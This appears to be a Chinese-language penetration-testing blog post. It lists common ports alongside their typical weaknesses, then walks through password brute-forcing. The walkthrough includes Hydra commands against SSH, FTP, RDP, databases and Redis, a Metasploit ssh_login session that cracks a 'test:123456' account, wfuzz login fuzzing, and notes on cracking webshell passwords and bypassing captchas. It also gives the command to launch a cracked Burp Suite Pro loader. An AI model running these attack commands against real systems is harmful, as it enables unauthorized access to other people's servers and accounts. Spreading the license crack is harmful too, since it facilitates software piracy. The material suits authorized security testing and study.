常见端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
1,web类(web漏洞/敏感目录)

第三方通用组件漏洞struts thinkphp jboss ganglia zabbix

80 web 
80-89 web 
8000-9090 web

2,数据库类(扫描弱口令)

1433 MSSQL 
1521 Oracle 
3306 MySQL 
5432 PostgreSQL 

3,特殊服务类(未授权/命令执行类/漏洞)

443 SSL心脏滴血 
873 Rsync未授权 
5984 CouchDB http://xxx:5984/_utils/ 
6379 redis未授权 
7001,7002 WebLogic默认弱口令,反序列 
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 
11211 memcache未授权访问 
27017,27018 Mongodb未授权访问 
50000 SAP命令执行 
50070,50030 hadoop默认端口未授权访问

4,常用端口类(扫描弱口令/端口爆破)

21 ftp 
22 SSH 
23 Telnet 
2601,2604 zebra路由,默认密码zebra
3389 远程桌面

端口合计详情

21 ftp 
 
22 SSH 
 
23 Telnet 
 
80 web 
 
80-89 web 
 
161 SNMP 
 
389 LDAP 
 
443 SSL心脏滴血以及一些web漏洞测试 
 
445 SMB 
 
512,513,514 Rexec 
 
873 Rsync未授权 
 
1025,111 NFS 
 
1433 MSSQL 
 
1521 Oracle:(iSqlPlus Port:5560,7778) 
 
2082/2083 cpanel主机管理系统登陆 (国外用较多)
 
2222 DA虚拟主机管理系统登陆 (国外用较多) 
 
2601,2604 zebra路由,默认密码zebra
 
3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了 
 
3306 MySQL 
 
3312/3311 kangle主机管理系统登陆 
 
3389 远程桌面 
 
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网 
 
5432 PostgreSQL 
 
5900 vnc 
 
5984 CouchDB http://xxx:5984/_utils/ 
 
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网 
 
6379 redis未授权 
 
7001,7002 WebLogic默认弱口令,反序列 
 
7778 Kloxo主机控制面板登录 
 
8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上 
 
8080 tomcat/WDCP主机管理系统,默认弱口令 
 
8080,8089,9090 JBOSS 
 
8083 Vestacp主机管理系统 (国外用较多) 
 
8649 ganglia 
 
8888 amh/LuManager 主机管理系统默认端口 
 
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 
 
10000 Virtualmin/Webmin 服务器虚拟主机管理系统 
 
11211 memcache未授权访问 
 
27017,27018 Mongodb未授权访问 
 
28017 mongodb统计页面 
 
50000 SAP命令执行 
 
50070,50030 hadoop默认端口未授权访问

Hydra

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
-R 继续从上一次进度接着破解。 
 
-S 采用 SSL 链接。 
 
-s PORT 可通过这个参数指定非默认端口。 
 
-l LOGIN 指定破解的用户,对特定用户破解。 
 
-L FILE 指定用户名字典。 
 
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。 
 
-P FILE 大写,指定密码字典。 
 
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 
 
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P 参数。 
 
-M FILE 指定目标列表文件一行一条。 
 
-o FILE 指定结果输出文件。 
 
-f 在使用-M 参数以后,找到第一对登录名或者密码的时候中止破解。 
 
-t TASKS 同时运行的线程数,默认为 16。 -w TIME 设置最大超时的时间,单位秒,默认是 30s。 
 
-v / -V 显示详细过程。 
-o 指定输出文件
service 指定服务名,支持的服务和协议:telnetftp pop3[-ntlm] imap[-ntlm] smb smbnt  http-{head|get} http-{get|post}-formhttp-proxy cisco cisco-enable vnc  ldap2 ldap3 mssql mysql oracle-listenerpostgres nntp socks5 rexec  rlogin pcnfs snmp rsh cvs svn icq sapr3 sshsmtp-auth[-ntlm] pcanywhere  teamspeak sip vmauthd firebird ncp afp 等等
1
hydra -l root -P password.txt ssh://***.***.***.*** -vV -t 15
1
2
[STATUS] attack finished for ***.***.***.*** (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found

指定多个ip进行穷举 导入-M IP地址文件

1
hydra -l root -P password.txt -M ip.txt ssh -o IPS.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
hydra -L /root/user -P /root/passwd ssh://192.168.1.0 -f -o /root/crack.txt -V 
ftp 
hydra -L /root/user -P /root/passwd ftp://192.168.1.0 -f -o /root/crack.txt -V 
rdp 
hydra -L /root/user -P /root/passwd rdp://192.168.1.0 -f -o /root/crack.txt -V 
mssql 
hydra -L /root/user -P /root/passwd mssql://192.168.0.129 -f -o /root/crack.txt -v 
mysql 
hydra -L /root/user -P /root/passwd mysql://192.168.0.129 -f -o /root/crack.txt –v -s 3306 
oracle 
hydra -P /root/passwd oracle://192.168.0.129 -f -o /root/crack.txt –v 
redis 
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 redis 
postgresql 弱口令检测 
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 postgresql 
指定多个ip进行穷举 
hydra -L /root/user -P /root/passlist -M /root/ip.txt  -V -o /root/crack mysql -t 16 
hydra -L /root/user -P /root/passlist ssh://192.168.0.112 -vV -f 
hydra -L /root/user -P /root/passlist ssh://192.168.0.112 -vV -f -o /root/crack.txt 
hydra -L /root/user -P /root/passlist ftp://192.168.0.106 -vV -f -o /root/crack.txt 
hydra -l sa -P /root/passlist mssql://192.168.0.103 –vV

可视化xhydra

image-20210411132809783

没啥好说的, image-20210411132919841

msf穷举模块

测试ip:***********

测试账号:test

测试密码:123456

1
msf6 > use auxiliary/scanner/ssh/ssh_login
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > info

       Name: SSH Login Check Scanner
     Module: auxiliary/scanner/ssh/ssh_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  todb <[email protected]>

Check supported:
  No

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   false            no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false            no        Add all passwords in the current database to the list
  DB_ALL_USERS      false            no        Add all users in the current database to the list
  PASSWORD                           no        A specific password to authenticate with
  PASS_FILE                          no        File containing passwords, one per line
  RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'f
                                               ile:<path>'
  RPORT             22               yes       The target port
  STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  THREADS           1                yes       The number of concurrent threads (max one per host)
  USERNAME                           no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per li
                                               ne
  USER_AS_PASS      false            no        Try the username as the password for all users
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           false            yes       Whether to print output for all attempts

Description:
  This module will test ssh logins on a range of machines and report
  successful logins. If you have loaded a database plugin and
  connected to a database this module will record successful logins
  and hosts so you can track your access.

References:
  https://cvedetails.com/cve/CVE-1999-0502/

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS *********
RHOSTS => *********
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME test
USERNAME => test
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/
.ICEauthority    .config          .hushlogin       .python_history  Desktop          Public
.Xauthority      .dbus            .local           .viminfo         Documents        Templates
.bash_history    .face            .msf4            .vnc             Downloads        Videos
.bashrc          .face.icon       .pip             .zsh_history     Music            tools
.cache           .gnupg           .profile         .zshrc           Pictures
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/tools/穷举工具/pass
passlist      password.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/tools/穷举工具/password.txt
PASS_FILE => /root/tools/穷举工具/password.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                Required  Description
   ----              ---------------                --------  -----------
   BLANK_PASSWORDS   false                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                              yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                          no        Try each user/password couple stored in the current data
                                                              base
   DB_ALL_PASS       false                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                          no        Add all users in the current database to the list
   PASSWORD                                         no        A specific password to authenticate with
   PASS_FILE         /root/tools/穷举工具/password.txt  no        File containing passwords, one per line
   RHOSTS            **********                 yes       The target host(s), range CIDR identifier, or hosts file
                                                               with syntax 'file:<path>'
   RPORT             22                             yes       The target port
   STOP_ON_SUCCESS   false                          yes       Stop guessing when a credential works for a host
   THREADS           1                              yes       The number of concurrent threads (max one per host)
   USERNAME          test                           no        A specific username to authenticate as
   USERPASS_FILE                                    no        File containing users and passwords separated by space,
                                                              one pair per line
   USER_AS_PASS      false                          no        Try the username as the password for all users
   USER_FILE                                        no        File containing usernames, one per line
   VERBOSE           false                          yes       Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS teur
[-] The following options failed to validate: Value 'teur' is not valid for option 'STOP_ON_SUCCESS'.
STOP_ON_SUCCESS => false
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > run

[+] ************:22 - Success: 'test:123456' 'Could not chdir to home directory /home/test: No such file or directory This account is currently not available. Could not chdir to home directory /home/test: No such file or directory This account is currently not available. '
[-] *************:22 - While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
auxiliary/scanner/ftp/ftp_login auxiliary/scanner/ssh/ssh_login auxiliary/scanner/telnet/telnet_login auxiliary/scanner/smb/smb_login auxiliary/scanner/mssql/mssql_login auxiliary/scanner/mysql/mysql_login auxiliary/scanner/oracle/oracle_login auxiliary/scanner/postgres/postgres_login auxiliary/scanner/vnc/vnc_login auxiliary/scanner/pcanywhere/pcanywhere_login auxiliary/scanner/snmp/snmp_login 


用法
msfconsole
msf auxiliary(mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > run
set 设置
show options 查询设置
back 返回
info 查询模块的信息
exploit/run 运行模块

邮箱破解

image-20210411140441052

后台密码穷举

burp下载🔰雨苁
打包了份启动器
无后台

1
2
源代码 就是
java --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader.jar -noverify -jar burpsuite_pro.jar

把下载的burp文件重命名如下

该exe使用方法

  • 创建快捷方式
  • 固定到开始屏幕

burploader-old.jar 为激活工具

1
java -jar burploader-old.jar

使用方法🔰雨苁博客有

wordpress

  • cmsmap穷举

一句话破解

  • cheetah

webshell密码破解

​ 验证码后台破解

  • 验证码cookie是否能重复利用
  • 能否重复利用
  • 绕过
  • ocr识别

wfuzz多线程百万密码测试

1
2
#example
wfuzz -c -z file./passwd.txt -u url -d "username=root&passed=FUZZ"

有 token 防御的网站后台

image-20221027172417758